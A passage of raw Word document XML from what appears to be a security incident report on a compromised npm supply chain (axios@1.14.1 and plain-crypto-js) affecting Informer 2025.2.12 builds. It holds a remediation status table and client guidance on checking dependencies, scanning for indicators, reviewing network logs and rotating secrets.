            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="747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AA" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Took down all March 31 builds of Informer 2025.2.12 from distribution channels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1408"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AB" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFAB0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFAAD" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFAAE" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Cleansed the Nexus </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> registry cache of all compromised package </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1408" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFAAF" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFAB4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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B1" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="747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B2" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Purged local </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> caches on all build servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1408"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B3" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFAB8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFAB5" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFAB6" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Sanitized all build server environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1408" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFAB7" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFABC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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B9" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="747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BA" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Rebuilt all 2025.2.12 GA </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>distributables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> from clean dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1408"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BB" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>In Progress</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFAC0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFABD" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFABE" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Published clean 2025.2.12 GA </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>distributables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1408" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFABF" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>In Progress</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFAC4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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C1" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="747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C2" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Notified all potentially affected clients with diagnosis and remediation steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1408"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C3" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>In Progress</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="278CFAC5" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="360" w:after="140"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:b w:val="0"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7.2 Client Remediation Guidance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFAC6" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Affected clients have been notified and are being provided with the following guidance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFAC7"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Remove all Informer 2025.2.12 March 31 build artifacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFAC8"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Check for compromised packages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> in their Informer installation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFAC9" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Run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list </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> to check for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>axios@1.14.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> anywhere in the dependency tree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFACA" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Run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list plain-crypto-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">to check for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>plain-crypto-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> anywhere in the dependency tree. Can also check for the presence of a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>node_modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>/plain-crypto-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFACB"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Scan for Filesystem IOCs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see Section 7.2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFACC"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Check network logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> for outbound connections to the C2 infrastructure (see Section 7.2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFACD"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Rotate all secrets and credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> exposed to compromised systems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
